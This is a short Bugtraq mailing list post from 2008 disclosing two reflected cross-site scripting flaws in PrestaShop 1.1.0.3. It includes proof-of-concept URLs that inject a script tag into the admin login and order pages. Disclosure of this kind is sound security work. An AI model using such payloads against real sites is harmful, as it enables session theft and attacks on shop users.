Bugtraq mailing list archives
Two XSS Flaws in PrestaShop 1.1.0.3
From: th3.r00k.ieatpork () gmail pork com
Date: Sun, 7 Dec 2008 20:32:37 -0700
Affects PrestaShop 1.1.0.3 product: homepage: http://prestashop.com This is XSS in the URI of PrestaShop. Trust no one, not even your $_SERVER[PHP_SELF] . http://10.1.1.155/prestashop_1.1.0.3/admin/login.php/%22%3Cscript%3Ealert(1)%3C/script%3E Add an item to the shoping cart and then vist this url: http://10.1.1.155/Audit/Commerce/prestashop_1.1.0.3/order.php/%22%3Cscript%3Ealert(1)%3C/script%3E Peace
Current thread:
- Two XSS Flaws in PrestaShop 1.1.0.3 th3 . r00k . ieatpork (Dec 08)